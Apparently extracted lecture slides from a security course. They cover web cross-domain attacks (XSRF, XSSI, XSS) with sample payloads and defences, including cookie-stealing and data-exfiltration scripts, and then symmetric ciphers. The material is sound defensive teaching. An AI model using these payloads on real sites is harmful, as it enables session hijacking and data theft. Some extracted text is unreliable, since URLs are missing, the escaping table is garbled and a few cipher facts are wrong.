Last Login Notify user of last login date, time, location each time they login Educate them to pay attention Tell user to report any inconsistencies Discrepancies = indications of attacks Catch attacks that may not have been noticed Ex: Alice usually logs in monthly from CA Last login was 2 weeks ago in Russia Alice knows something’s wrong, reports it

9.6.9. Image Authentication Combat phishing: images as second-factor
Ask users to pick image during account creation Display at login after username is entered Phisher can’t spoof the image Educate user to not enter password if he doesn’t see the image he picked Recently deployed by PassMark, used on and other financial institutions

One-Time Passwords Multiple uses of password gives attacker multiple opportunities to steal it OTP: login in with different password each time Devices generate passwords to be used each time user logs in Device uses seed to generate stream of passwords Server knows seed, current time, can verify password OTP devices integrated into PDAs, cell-phones

CHAPTER 10 Cross-Domain Security in Web Applications

Agenda Domain: where our apps & services are hosted
Cross-domain: security threats due to interactions between our applications and pages on other domains Alice is simultaneously (i.e. same browser session), using our (“good”) web-application and a “malicious” web-application Security Issues? Solutions? Cross-Site Request Forgery, Scripting…

10.1. Interaction Between Web Pages From Different Domains
Possible interactions limited by same-origin policy (a.k.a. cross-domain security policy) Links, embedded frames, data inclusion across domains still possible Client-side scripts can make requests cross-domain HTTP & cookie authentication two common modes (both are usually cached) Cached credentials associated with browser instance Future (possibly malicious) requests don’t need further authentication

10.1.1. HTML, JavaScript, and the Same-Origin Policy
Modern browsers use DHTML Support style layout through CSS Behavior directives through JavaScript Access Document Object Model (DOM) allowing reading/modifying page and responding to events Origin: protocol, hostname, port, but not path Same-origin policy: scripts can only access properties (cookies, DOM objects) of documents of same origin

10.1.1. Same-Origin Examples Same Origin All Different Origins
same protocol: http, host: examplesite, default port 80 All Different Origins Different protocol: http vs. https, different ports: 80 vs. 8080, different hosts: examplesite vs. hackerhome

10.1.2. Possible Interactions of Documents from Different Origins (1)
hackerhome.org can link to us, can’t control <a href=" here!</a> Or include a hidden embedded frame: <iframe style="display: none" src=" some_url"></iframe> No visible cue to the user (style attribute hides it) Happens automatically, without user interaction Same-origin policy prevents JavaScript on hackerhome direct access to our DOM

10.1.2. Possible Interactions (2)
Occasionally, data loaded from one domain is considered to originate from different domain <script src=" hackerhome can include this script loaded from our site, but it is considered to originate from hackerhome instead Included script can inspect contents of enclosing page which can define evaluation environment for script

10.1.2. Possible Interactions (3)
Another way attacker can initiate requests from user’s browsers to our server: Form is submitted to our server without any input from user Only has a hidden input field, nothing visible to user Form has a name, so script can access it via DOM and automatically submit it <form name="f" method="POST" action=" <input type="hidden" name="cmd" value="do_something"> ... </form> <script>document.f.submit();</script>

10.1.3. HTTP Request Authentication
HTTP is stateless, so web apps have to associate requests with users themselves HTTP authentication: username/passwd automatically supplied in HTTP header Cookie authentication: credentials requested in form, after POST app issues session token Browser returns session cookie for each request Hidden-form authentication: hidden form fields transfer session token Http & cookie authentication credentials cached

10.1.4. Lifetime of Cached Cookies and HTTP Authentication Credentials
Temporary cookies cached until browser shut down, persistent ones cached until expiry date HTTP authentication credentials cached in memory, shared by all browser windows of a single browser instance Caching depends only on browser instance lifetime, not on whether original window is open

10.1.4. Credential Caching Scenario
(1) Alice has browser window open, (2) creates new window (3) to visit our site, HTTP authentication credentials stored (4) She closes the window, but original one still open (5) later, she’s lured to the hacker’s site which causes a surreptitious request to our site utilizing the cached credentials Credentials persisted even after (4), cookies could have been timed-out; step (5) could happen days or weeks after (4)

10.2. Attack Patterns Security issues arising from browser interacting with multiple web apps (ours and malicious ones), not direct attacks Cross-Site Request Forgery (XSRF) Cross-Site Script Inclusion (XSSI) Cross-Site Scripting (XSS)

10.2.1. Cross-Site Request Forgery (XSRF)
Malicious site can initiate HTTP requests to our app on Alice’s behalf, w/o her knowledge Cached credentials sent to our server regardless of who made the request Ex: change password feature on our app Hacker site could execute a script to send a fake password-change request to our form authenticates because cookies are sent <form method="POST" action="/update_profile"> ... New Password: <input type="password" name="password"> ... </form>

XSRF Example 1. Alice’s browser loads page from hackerhome.org 2. Evil Script runs causing evilform to be submitted with a password-change request to our “good” form: with a <input type="password" id="password"> field evilform <form method="POST" name="evilform" target="hiddenframe" action=" <input type="hidden" id="password" value="evilhax0r"> </form> <iframe name="hiddenframe" style="display: none"> </iframe> <script>document.evilform.submit();</script> 3. Browser sends authentication cookies to our app. We’re hoodwinked into thinking the request is from Alice. Her password is changed to evilhax0r!

XSRF Impacts Malicious site can’t read info, but can make write requests to our app! In Alice’s case, attacker gained control of her account with full read/write access! Who should worry about XSRF? Apps w/ server-side state: user info, updatable profiles such as username/passwd (e.g. Facebook) Apps that do financial transactions for users (e.g. Amazon, eBay) Any app that stores user data (e.g. calendars, tasks)

Example: Normal Interaction
Alice bank.com /login.html /auth uname=victim&pass=fmd9032 Cookie: sessionid=40a4c04de /viewbalance Cookie: sessionid=40a4c04de “Your balance is $25,000”

Example: Another XSRF Attack
Alice bank.com evil.org /login.html /auth uname=victim&pass=fmd9032 Cookie: sessionid=40a4c04de /evil.html <img src=" addr=123 evil st & amt=$10000"> /paybill?addr=123 evil st, amt=$10000 Cookie: sessionid=40a4c04de “OK. Payment Sent!”

10.2.2. Cross-Site Script Inclusion (XSSI)
3rd-party can include <script> sourced from us Static Script Inclusion Purpose is to enable code sharing, i.e. providing JavaScript library for others to use Including 3rd-party script dangerous w/o control since it runs in our context with full access to client data Dynamic Script Instead of traditional postback of new HTML doc, asynchronous requests (AJAX) used to fetch data Data exchanged via XML or JSON (arrays, dicts)

10.2.2. XSSI Malicious website can request dynamic script
Browser authentication cookies would be sent Script (JSON fragment) returned by server is accessible to and runs on the malicious site But, script is evaluated in hacker’s context Hacker redefines the callback method to process and harvest the user data as desired

JavaScript Code Snippet
XSSI Example Request Client Server JavaScript Code Snippet Reply UpdateHeader({ "date_time": "2007/07/19 6:22", "logged_in_user": "alice", "account_balance": "256.98" }) Typical Interaction sends back user data! Attack Scenario <script> function UpdateHeader(dict) { if (dict['account_balance'] > 100) { do_phishing_redirect( dict['logged_in_user']); } } // do evil stuff, get user data </script> <script src=" Malicious site loads script to initiate the request instead Browser sends cookies Server replies as usual Evil Script gets user data!

XSSI Example: AJAX Script
Dynamic Script Inclusion: viewbalance.html Good Site: <script> x = new XMLHTTPRequest(); // used to make an AJAX request x.onreadystatechange = ProcessResults; x.open("POST", " function ProcessResults() { if (x.readyState == 4 and x.status = 200) eval(x.responseBody); } </script>

Normal AJAX Interaction
Alice bank.com login & authenticate Cookie: sessionid=40a4c04de /viewbalance.html Cookie: sessionid=40a4c04de /json/get_data?callback=RenderData RenderData({“acct_no”:”494783”, “balance”:”10000”}) RenderData

Another XSSI Attack Alice bank.com evil.org /evil.html
login & authenticate Cookie: sessionid=40a4c04de /viewbalance.html Cookie: sessionid=40a4c04de /evil.html <script> function RenderData(args) { sendArgsToEvilOrg(args); } </script> <script src=" callback=RenderData"> RenderData({“acct_no”:”494783”, “balance”:”10000”}) Overrides Callback! RenderData({“acct_no”:”494783”, “balance”:”10000”})

10.2.3. Cross-Site Scripting (XSS)
What if attacker can get a malicious script to be executed in our application’s context? access user’s cookies, transfer to their server Ex: our app could have a query parameter in a search URL and print it out on page Following fragment in returned HTML document with value of parameter question inserted into page Unfiltered input allows attacker to inject scripts ...<p>Your query for 'cookies' returned the following results:<p>...

XSS Example Alice tricked into loading URL (thru link or hidden frame sourcing it) Server’s response contains Attack string URL-encodes < and > malicious-script, any script attacker desires, is executed in context of our domain question=cookies+%3Cscript%3Emalicious-script%3C/script%3E <p>Your query for 'cookies <script>malicious-script</script>' returned the following results:</p>

10.2.3. XSS Exploits: Stealing Cookies
Malicious script could cause browser to send attacker all cookies for our app’s domain Attacker gains full access to Alice’s session Script associated with our domain Can access document.cookie in DOM Constructs URL on attacker’s server, gets saved in a log file, can extract info from cookie parameter <script> i = new Image(); i.src = " + escape(document.cookie); // URL-encode </script>

10.2.3. XSS Exploits: Scripting the Vulnerable Application
Complex script with specific goal Get personal user info, transfer funds, etc… More sophisticated than just stealing cookies Advantages over cookie stealing Stolen session cookie may expire before it’s used Never makes a direct request to our server We can’t log his IP, he’s harder to trace

10.2.3. XSS Exploits: Modifying Web Pages
Attacker can script modifications to web pages loaded from our site by manipulating DOM Part of social engineering, phishing attack Intended for viewing by victim user Modified page is loaded from our site So URL is still the same No certificate-mismatch even with SSL Hard to tell that modification is by 3rd party

10.2.3. Sources of Untrusted Data
Query parameters, HTML form fields Path of the URI which could be inserted into page via a “Document not found” error Cookies, parts of the HTTP request header (e.g. Referer header) Data inserted into a SQL DB, file system 3rd party data (e.g. RSS feed)

10.2.3. Stored vs. Reflected XSS
Reflected XSS: script injected into a request and returned immediately in response (like query parameter example) Stored XSS: script delivered to victim some time after being injected stored somewhere in the meantime attack is repeatable, more easily spread Ex: Message board with injected script in a message, all users who view the message will be attacked Underlying issue for both is untrusted data

10.2.3. MySpace Attacked by Stored XSS Worm
XSS really damaging when stored XSS can propagate in a worm-like pattern In 2005, XSS worm released on MySpace Propagated through profiles via friend connections Payload harmless: added user “Samy” to infected user’s friends list Impact: MySpace down for several hours to clean up profiles (but XSS worm impact could be much worse!)

10.3. Preventing XSRF HTTP requests originating from user action are indistinguishable from those initiated by a script Need own methods to distinguish valid requests Inspecting Referer Headers Validation via User-Provided Secret Validation via Action Token

10.3.1. Inspecting Referer Headers
Referer header specifies the URI of document originating the request Assuming requests from our site are good, don’t serve requests not from our site OK, but not practical since it could be forged or blanked (even by legitimate users) For well-behaved browsers, reasonable to expect Referer headers to be accurate, if present But if blank, we can’t tell if it’s legitimate or not

10.3.2. Validation via User-Provided Secret
Can require user to enter secret (e.g. login password) along with requests that make server-side state changes or transactions Ex: The change password form (10.2.1) could ask for the user’s current password Balance with user convenience: use only for infrequent, “high-value” transactions Password or profile changes Expensive commercial/financial operations

10.3.3. Validation via Action Token
Add special action tokens as hidden fields to “genuine” forms to distinguish from forgeries Same-origin policy prevents 3rd party from inspecting the form to find the token Need to generate and validate tokens so that Malicious 3rd party can’t guess or forge token Then can use to distinguish genuine and forged forms How? We propose a scheme next.

10.3.3. Generating Action Tokens
Concatenate value of timestamp or counter c with the Message Authentication Code (MAC) of c under secret key K: Token: T = MACK(c)||c Security dependent on crypto algorithm for MAC || denotes string concatenation, T can be parsed into individual components later Recall from 1.5., MACs are function of message and secret key (See Ch. 15 for more details)

10.3.3. Validating Action Tokens
Split token T into MAC and counter components Compute expected MAC for given c and check that given MAC matches If MAC algorithm is secure and K is secret, 3rd party can’t create MACK(c), so can’t forge token

Problem with Scheme Application will accept any token we’ve previously generated for a browser Attacker can use our application as an oracle! Uses own browser to go to page on our site w/ form Extracts the token from hidden field in form Need to also verify that incoming request has action token sent to the same browser (not just any token sent to some browser)

10.3.3. Fixing the Problem Bind value of action token to a cookie
Same-origin policy prevents 3rd party from reading or setting our cookies Use cookie to distinguish between browser instances New Scheme Cookie C is unpredictable, unique to browser instance C can be session authentication cookie Or random 128 bits specifically for this purpose L = action URL for form with action token Compute T = MACK(C||d||L), d is separator (e.g. ;) d ensures uniqueness of concatenation

10.3.3. Validation in New Scheme
Extract request URL L’ (w/o query part for GET request) and cookie C’. Compute expected value of action token: Texpected = MACK(C’||d||L’) Extract actual Trequest of action token from appropriate request parameter Verify Texpected = Trequest ,otherwise reject Occasionally legitimate request may fail Ex: user leaves page w/ form open and initiates new session in different window; action token for original form becomes “stale”

10.3.4. Security Analysis of the Action Token Scheme
Value of token chosen to be unguessable Output of cryptographically strong MAC algorithm Attack rate limited by JavaScript loop, far slower than rates usually supposed for offline attacks against crypto algorithms Only way to obtain token (w/o key) is to use our app as an oracle This also requires the user’s session cookie Assume attacker doesn’t have this otherwise he could already directly hijack the session anyway Session cookies are also hard to guess

10.3.4. Security Analysis: Leakage of Action Tokens
For GET requests, action token visible as query parameter in request URL Would appear in proxy and web server logs Could be leaked in Referer header if page contains references (images, links) to 3rd party documents HTTP spec recommends POST instead of GET Scheme incorporates target action URL into MAC computation If one URL is leaked, can’t be used against another Use fresh cookie for each browser instance, so stolen action token not usable for future sessions

10.3.4. Analysis: Limitations in Presence of XSS Vulnerabilities
If application is vulnerable to XSS attack, action token scheme is ineffective. Attacker can inject script to steal cookies and corresponding action tokens. Or even directly “fill out” forms and submit request within context of user’s session But if XSS vulnerability exists, attacker already has a better mode of attack than XSRF

10.3.4. Analysis: Relying on Format of Submitted Data
Communication with server often follows RPC pattern through XMLHttpRequest object Marshalling data in some form (e.g. JSON/XML) Form-based request ex: results in following POST request (not valid JSON) Form’s fields encoded as key/value pairs Metacharacters (&, =, space) are HTML-encoded All key/value pairs concatenated, separated by & char <form method="POST" action=" <input name="foo" value="I'd like a cookie"> <input name="bar" value="and some tea & coffee"> </form> foo=I'd%20like%20a%20cookie&bar=and%20some%20tea%20%26%20coffee

10.3.4. Relying on Format of Submitted Data
<form> tag also has enctype attribute specifying encoding via MIME media type Default: application/x-www-form-urlencoded text/plain (&-separated pairs w/o encoding) Form Example and corresponding POST: POST request can have arbitrary content (including valid JSON/XML)! Can’t just rely on format, use action tokens to prevent XSRF! <form method="POST" action=" enctype="text/plain"> <input name='{"junk": "ig' value='nore", "new_password": "evilhax0r"}'> </form> Valid JSON! {"junk": "ig=nore", "new_password": "evilhax0r"}

10.4. Preventing XSSI Can’t stop others from loading our resources
Similar problem with preventing XSRF need to distinguish 3rd party references from legitimate ones, so we can deny the former Authentication via Action Token Restriction to POST Requests Preventing Resource Access for Cost

10.4.1. Authentication via Action Token
Put an additional query parameter w/ token which must be consistent w/ session cookie Malicious page can’t guess token, request refused Employ same action token scheme introduced against XSRF in (can use a single token for both purposes) Use POST whenever possible, to prevent leaking of token via GET parameters in URL Leakage risk less b/c JavaScript document, not HTML

10.4.2. Restriction to POST Requests
Cross-domain attacks entry point: <script> tags these always use GET To protect read-only requests, restrict to POST Use action tokens to protect all Ajax requests Ajax mixes read-only and state-changing (write) requests, so POST restriction alone doesn’t help

10.4.3. Preventing Resource Access for Cost Reasons
If ISP charges for volume of traffic Limit resource inclusion by 3rd party for cost reasons Just decline requests if Referer header is not one of our sites Serve requests with empty Referer headers Not a complete solution, but sufficient for limiting “bandwith leeching” Perhaps a few requests slip through, but only a fraction of the cost still remains

10.5. Preventing XSS Never send untrusted data to browser
Such that data could cause execution of script Usually can just suppress certain characters We show examples of various contexts in HTML document as template snippets Variable substitution placeholders: %(var)s evil-script; will denote what attacker injects Contexts where XSS attack is possible

10.5.1. General Considerations
Input Validation vs. Output Sanitization XSS is not just a input validation problem Strings with HTML metachars not a problem until they’re displayed on the webpage Might be valid elsewhere, e.g. in a database, and thus not validated later when output to HTML Sanitize: check strings as you insert into HTML doc HTML Escaping escape some chars with their literals e.g. & = & < = < > = &rt; “ = " Library functions exist, but check docs (may not escape all characters)!

10.5.2. Simple Text Most straightforward, common situation
Example Context: Attacker sets query = <script>evil-script;</script> HTML snippet renders as Prevention: HTML-escape untrusted data Rationale: If not escaped <script> tags evaluated, data may not display as intended <b>Error: Your query '%(query)s' did not return any results.</b> <b>Error: Your query '<script>evil-script;</script>' did not return any results.</b>

10.5.3. Tag Attributes (e.g., Form Field Value Attributes)
Contexts where data is inserted into tag attribute Example HTML Fragment: Attacker sets Renders as Attacker able to “close the quote”, insert script <form ...><input name="query" value="%(query)s"></form> query = cookies"><script>evil-script;</script> <form ...> <input name="query" value="cookies"> <script>evil-script;</script>"> </form>

10.5.3. More Attribute Injection Attacks
Image Tag: <img src=%(image_url)s> Attacker sets image_url = onerror=evil-script; After Substitution: <img src= onerror=evil-script;> Lenient browser: first whitespace ends src attribute onerror attribute sets handler to be desired script Attacker forces error by supplying URL w/o an image Can similarly use onload, onmouseover to run scripts Attack string didn’t use any HTML metacharacters!

10.5.3. Preventing Attribute Injection Attacks
HTML-escape untrusted data as usual Escape &, ', ", <, > Also attribute values must be enclosed in " " Must escape the quote character to prevent “closing the quote” attacks as in example Decide on convention: single vs. double quotes But escape both anyway to be safe

10.5.4. URL Attributes (href and src)
Dynamic URL attributes vulnerable to injection Script/Style Sheet URLs: <script src="%(script_url)s"> Attacker sets script_url = javascript: URLS - <img src="%(img_url)s"> By setting img_url = javascript:evil-script; we get <img src="javascript:evil-script;"> And browser executes script when loading image

10.5.4. Preventing URL Attribute Injection
Escape attribute values and enclose in " " Follow guidelines for general injection attacks Only serve data from servers you control For URLs to 3rd party sites, use absolute HTTP URLS (i.e. starts with or Against javascript: injection, whitelist for good URLs (apply positive filter) Not enough to just blacklist, too many bad URLs Ex: even escaping colon doesn’t prevent script Could also be data:text/html,<script>evil-script;</script>

Style Attributes Dangerous if attacker controls style attributes Attacker injects: Browser evaluates: In IE 6 (but not Firefox 1.5), script is executed! Prevention: whitelist through regular expressions Ex: ^([a-z]+)|(#[0-9a-f]+)$ specifies safe superset of possible color names or hex designation Or expose an external param (e.g. color_id) mapped to a CSS color specifier (lookup table) <div style="background: %(color)s;">I like colors.</div> color = green; background-image: url(javascript:evil-script;) <div style="background: green; background-image: url(javascript:evil-script;);"> I like colors. </div>

Within Style Tags Injections into style= attributes also apply for <style> tags Validate data by whitelisting before inserting into HTML document <style> tag Apply same prevention techniques as in

10.5.7. In JavaScript Context Be careful embedding dynamic content
<script> tags or handlers (onclick, onload, …) In Ajax-apps, server commonly returns JavaScript: Attacker injects: And evil-script; is executed! <script> var msg_text = 'oops'; evil-script; //'; // do something with msg_text </script> <script> var msg_text = '%(msg_text)s'; // do something with msg_text </script> msg_text = oops'; evil-script; //

10.5.7. Preventing JavaScript Injection
Don’t insert user-controlled strings into JavaScript contexts <script> tags, handler attributes (e.g. onclick) w/in code sourced in <script> tag or using eval() Exceptions: data used to form literal (strings, ints, …) Enclose strings in ' ' & backslash escape (\n, \t, \x27) Format non-strings so that string rep is not malicious Backslash escaping important to prevent “escape from the quote” attack where notions of “inside” and “outside” string literals is reversed Numeric literals ok if from Integer.toString(), …

10.5.7. Another JavaScript Injection Example
From previous example, if attacker sets the following HTML is evaluated: Browser parses document as HTML first Divides into 3 <script> tokens before interpreting as JavaScript Thus 1st & 3rd invalid, 2nd executes as evil-script msg_text = foo</script><script>evil-script;</script><script> <script>var msg_text = 'foo</script> <script>evil-script;</script> <script>'// do something with msg_text</script>

10.5.8. JavaScript-Valued Attributes
Handlers inside onload, onclick attributes: HTML-unescaped before passing to JS interpreter Ex: Attacker injects: Browser Loads: JavaScript Interpreter gets Prevention: Two Rounds of Escaping JavaScript escape input string, enclose in ' ' HTML escape entire attribute, enclose in " " <input ... onclick='GotoUrl("%(targetUrl)s");'> targetUrl = foo");evil_script(" <input ... onclick='GotoUrl("foo");evil_script("");'> GotoUrl("foo");evil_script("");

10.5.8. JavaScript-Valued Attributes Prevention Rationale
HTML-escaping step prevents attacker from sneaking in HTML-encoded characters Different style quotes Single for JavaScript literals Double for HTML attributes Avoid one type accidentally “ending” the other JavaScript escape function should escape HTML metachars (&, <, >, ", ') as well Escaped into hex or unicode Additional security measure if second step forgotten

10.5.9. Redirects, Cookies, and Header Injection
Need to filter and validate user input inserted into HTTP response headers Ex: servlet returns HTTP redirect Attacker Injects: (URI-encodes newlines) HTTP/ Moved Content-Type: text/html; charset=ISO Location: %(redir_url)s <html> <head><title>Moved</title></head> <body>Moved <a href='%(redir_url)s'>here</a></body> </html> oops:foo\r\nSet-Cookie: SESSION=13af..3b; domain=mywwwservice.com\r\n\r\n <script>evil()</script>

10.5.9. Header Injection Example
Resulting HTTP response: Attacker sets desired cookies: could overwrite user preferences (DoS) or action tokens (XSRF) Double CRLF injects script into body which could be executed after Location: header is invalidated HTTP/ Moved Content-Type: text/html; charset=ISO Location: oops:foo Set-Cookie: SESSION=13af..3b; domain=mywwwservice.com <script>evil()</script><html><head><title>Moved</title> </head><body> Moved <a href='oops:foo <script>evil()</script>'>here</a></body></html>

10.5.9. Preventing Header Injection
Ensure URLs for Location: headers are well-formed http: or https: Only consists of characters permitted to be non-escaped according to standard (e.g. RFC 2396) Checks that it’s not javascript: URL for example Check that cookie names and values within standard (e.g. RFC 2965) Setting other headers: ensure values contain only characters allowed by HTTP/1.1 protocol spec (RFC 2616) Restricting to specs ensures browser parses correctly

10.5.10. Filters for “Safe” Subsets of HTML
Allow “safe” subset of HTML and render to user Ex: web-based app Can allow “harmless” HTML tags (e.g. <h1>) But don’t allow execution of malicious scripts Use strict HTML parser Strip tags and attributes that are not whitelisted (i.e. known to not allow arbitrary scripting) Consult a security expert

10.5.11. Unspecified Charsets, Browser-Side Charset Guessing, and UTF-7 XSS Attacks
Browser needs to know what character encoding to use to render HTML document Server can specify through charset parameter of Content-Type HTTP header or <meta http-equiv> Default: iso Or may try to guess the charset Example: attacker injects UTF-7 text No characters that are normally filtered No charset specified, so IE guesses UTF-7 +ADw- , +AD4- encode < , >: script executed! +ADw-script+AD4-alert(document.domain);+ADw-/script+AD4-

10.5.11. Preventing Charset XSS Attacks
Explicitly specify appropriate charset Ex: Content-Type: text/html; charset=UTF-8 Or through tag: Meta-tag should appear before untrusted tags Appropriate: the one that reflects encoding assumptions used by app for filtering/sanitizing input and HTML encoding output strings <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

10.5.12. Non-HTML Documents & IE Content-Type Sniffing
Browsers may ignore MIME type of document Specifying Content-Type: text/plain should not interpret HTML tags when rendering But not true for IE: mime-type detection AKA Content-Type Sniffing: ignores MIME spec IE scans doc for HTML tags and interprets them Even reinterprets image documents as HTML!

10.5.12. Preventing Content-Type Sniffing XSS Attacks
Validate that content format matches MIME type Especially for image files: process through library Read image file, convert to bitmap, convert back Don’t trust image file format, Ensure no HTML tags in first 256 bytes of non-HTML file Could prepend 256 bytes of whitespace Empirically determined # (also in docs), could be different for other versions Or could HTML-escape entire document

10.5.13. Mitigating the Impact of XSS Attacks
HTTP-Only Cookies: incomplete protection HTTPOnly attribute on cookie in IE prevents it from being exposed to client-side scripts can prevent traditional session hijacking But only for IE and doesn’t prevent direct attacks Should also disable TRACE requests Binding Session Cookies to IP Address check if session token is being used from multiple IP addresses (especially geographically distant) could cause user inconvenience, use only for high-value transactions

Types of XSS Attacks Recap
Context Examples (where to inject evil-script) Prevention Technique Simple Text <b>'%(query)'</b> HTML Escaping Tag Attributes (Attribute-Injection) <input … value ="%(query)"/> (attrib values in " ") URL Attributes (href, src attribs.) <script src ="%(script_url)"> Whitelist (src from own server?) Style Attributes (or <style> tags) <div style="back ground: %(color);"> (Use RegExps) JavaScript (JS) <input... onclick=''> Escape JS/HTML HTTP Header HTTP/ Moved... Location: %(redirUrl) Filter Bad URLs (check format)

Summary Cross-Domain Attacks Prevention:
Not direct attacks launched against our app User views ours and a malicious site in same browser Attacker tries to run evil scripts, steal our cookies, … Types: XSRF, XSSI, XSS Prevention: Against XSRF & XSSI: use cookie-based authentication, prefer POST over GET, action tokens Against XSS: validate input & sanitize output, use HTML/Javascript escaping appropriately, whitelist

Conceptual Exercises (1)
In Chapter 9, the password manager stored passwords in a file. What would be some of the trade-offs involved in storing the passwords in a relational database instead of in a file? What types of additional input validation might need to be done on usernames and passwords if they are to be stored in a database?

Conceptual Exercises (2)
Write an HTML filter that, given an arbitrary HTML document, produces an HTML document that will not result in the execution of script if loaded into a user’s browser, but leaves “basic markup” (fonts, formatting, etc.) intact. Consider the possibility that the input document is not well-formed HTML, and also consider browser-specific features.

Programming Problem Implement HTTP digest authorization. Use a password file with salts, and reuse the BasicAuthWebServer from Chapter 9. Implement a program that allows you to add and delete passwords to and from the password file.

CHAPTER 12 Symmetric Key Cryptography

Agenda Cryptography (crypto)– study of how to mathematically encode & decode messages Cryptographic primitive (low-level) = algorithm Applied Cryptography – how to use crypto to achieve security goals (e.g. confidentiality) Primitives build up higher-level protocols (e.g. digital signature – only constructible by signer) Symmetric Encryption: Alice, Bob use same key

12.1. Introduction to Cryptography
Goal: Confidentiality Message “sent in clear”: Eve can overhear Encryption unintelligible to Eve; only Bob can decipher with his secret key (shared w/ Alice) Alice Bob “My account number is and my PIN is 4984” Eve

12.1.1. Substitution Ciphers Plaintext: meet me at central park
Ciphertext: phhw ph dw fhqwudo sdun Plain: abcdefghijklmnopqrstuvwxyz Cipher: defghijklmnopqrstuvwxyzabc Key is 3, i.e. shift letter right by 3 Easy to break due to frequency of letters Good encryption algorithm produces output that looks random: equal probability any bit is 0 or 1

12.1.2. Notation & Terminology
m = message (plaintext), c = ciphertext F = encryption function F-1 = decryption function k = key (secret number) c = F(m,k) = Fk(m) = encrypted message m = F-1(c,k) = F-1k(c) = decrypted message Symmetric cipher: F-1(F(m,k), k) = m, same key Cipher

Symmetric Encryption Alice encrypts a message with the same key that Bob uses to decrypt. Eve can see c, but cannot compute m because k is only known to Alice and Bob Alice Bob 1. Construct m 2. Compute c= F(m,k) 3. Send c to Bob c 4. Receive c from Alice 5. Compute d=F-1(c,k) 6. m = c

12.1.3. Block Ciphers Blocks of bits (e.g. 256) encrypted at a time
Examples of several algorithms: Data Encryption Standard (DES) Triple DES Advanced Encryption Standard (AES) or Rijndael Internal Data Encryption Algorithm (IDEA), Blowfish, Skipjack, many more… (c.f. Schneier)

DES Adopted in 1977 by NIST Input: 64-bit plaintext, 56-bit key (64 w/ parity) Parity Bits: redundancy to detect corrupted keys Output: 64-bit ciphertext Susceptible to Brute-Force (try all 256 keys) 1998: machine Deep Crack breaks it in 56 hours Subsequently been able to break even faster Key size should be at least 128 bits to be safe XOR = Exclusive OR FIPS = Federal Information Processing Standard Key size was originally 128 bits– NSA reduced it to 56 bits. Key is actually 64 bits, with 8 parity bits. We say the key is 56-bits because the key only has 56-bits of entropy. Designed for speed and hardware implementation. feistel was one of the guys at IBM that helped design the algorithm. IP and its inverse don’t provide any additional security, but they simplify the hardware implementation of DES: see High-level description of algorithm: Input bits are permuted Bits are split into left half and right half During each round, the 32 bits of the right half are expanded to 48 bits (some bits are used more than once), and XORed with 48 bits selected from the key. The XORed bits are then run through 8 “S-boxes” or substitutions, where each S-box takes 6 bits as input and produces 4 bits of output. The S-boxes give DES its security. The result of the S-box computation is then permuted once more (using a P-box) and XORed with the left half of the bits. The left and right halves are then switched for the next round. 16 rounds are repeated, and then a final permutation is applied. Goal: every bit of the ciphertext should be a random function of the plaintext and the key such that given many plaintext/ciphertext pairs, it should be computationally infeasible to deduce the key. Same algorithm used for encryption and decryption. For decryption, use the key in reverse. Sounds like black magic. There was much speculation that the NSA put a “back door” into the algorihtm. Exportable only if <=40-bits are used for the key. Is 16 rounds enough? Algorithm has been broken with smaller numbers of rounds. Use 3-DES for more rounds. More information and DES spec at

12.1.3. Triple DES Do DES thrice w/ 3 different keys (slower)
c = F(F-1(F(m ,k1),k2),k3) where F = DES Why decrypt with k2? Backwards compatible w/ DES, easy upgrade Keying Options: Key Size (w/ Parity) k1 ≠ k2 ≠ k3 : 168-bit (192-bit) k1 = k3 ≠ k2 : bit (128-bit) k1 = k2 = k3 : 56-bit (64-bit) (DES) Triple DES can be used to achieve a higher level of security than with DES alone. As the name implies, Triple DES runs DES three times with three potentially different keys. The way that you would do a triple DES encryptions is by taking the input message, M, encrypting with key 1, decrypting the resulting message with key 2, and encrypting that message with key 3. You might be wondering why Triple DES does a decryption as its second step instead of just encrypting three times. The reason is for backward compatibility. Notice that if k1=k2=k3 (all the keys are the same), doing a Triple DES encryption is exactly equivalent to doing a DES encryption. This means that if your system used to, say, use a microchip that had DES implemented in hardware, you could switch to using a microchip that uses Triple DES quite easily by giving the Triple DES chip the same key for all three required keys. Of course, once you do switch over to using Triple DES, you can achieve a higher level of security by using more than just one key. To get the higher level of security with Triple DES, you can choose three different keys, which will give you 168-bits of security. (The entire key will be 192-bits including the parity bits.) Or alternatively, you can use only two different keys, and you can set k1 = k3 which will give you 112-bits of security. (The key will be 128-bits with the parity bits.) You may have heard that web browsers do “128-bit encryption” when communicating with web servers that use SSL, the secure sockets layer protocol. This “128-bit encryption” is done with Triple DES using two keys, so know you know a little bit about the type of encryption that web browsers use. We will learn more about SSL in Lecture 5. Finally, as we mentioned earlier, if you use the same key as input for all the three Triple DES keys, Triple DES is equivalent to DES, with the caveat that it could be up to three times slower since two encryptions and one decryption will need to be done with Triple DES to emulate DES. Also part of FIPS 46-3. 128-bit 3DES used in web browsers that support SSL. Much more secure than DES. Why decrypt using second key instead of encrypt? For backward compatibility.

12.1.3. AES (Rijndael) Invented by 2 Belgian cryptographers
Selected by NIST from 15 competitors after three years of conferences vetting proposals Selection Criteria: Security, Cost (Speed/Memory) Implementation Considerations (Hardware/Software) Key size & Block size: 128, 192, or 256 bits (much larger than DES) Rely on algorithmic properties for security, not obscurity The next symmetric cipher that we will cover is AES, the Advanced Encryption Standard. AES is meant to be a replacement for DES that has been adopted by NIST in October DES is too easily crackable, and Triple DES is too slow (requiring 48 rounds of a Feistel network). AES is meant to be a replacement for DES / Triple-DES that provides security with larger keys and fewer rounds. The AES standard is a government endorsed cipher that was developed using the most open process to date for such things. In 1997, the need for a new standard was announced by NIST, that National Institiute for Standards and Technology, and invited proposals for a new symmetric block cipher that satisfied their requirements. Fifteen different ciphers were proposed by cryptographers from all over the world, and conferences were held over the course of a three year period that debated the strengths and weaknesses of the proposed ciphers with regards to security, speed, memory requirements, and other hardware and software implementation considerations. The requirements for AES were more stringent than DES because, for example, NIST wanted to select an algorithm that would work well on mobile devices that have slower processors and less memory than desktop computers. In August 1999, five finalists were chosen, and a proposal made by 2 Belgian cryptographers called Rijndael was chosen to be the AES standard. Rijndael supports key and block sizes of 128, 192, or 256 bits, and runs in 10, 12, or 14 rounds depending up on the key/block size. Interestingly enough, the Rijndael cipher uses S-boxes and XORs, but does not use a Fiestel network. In applications that need symmetric block encryption, using AES will achieve better performance and will use less memory than DES or Triple DES. Due to the nature of the selection process that it went through, the hope is that AES is also more secure than DES. Selection process report at More information at

12.1.4. Security by Obscurity: Recap
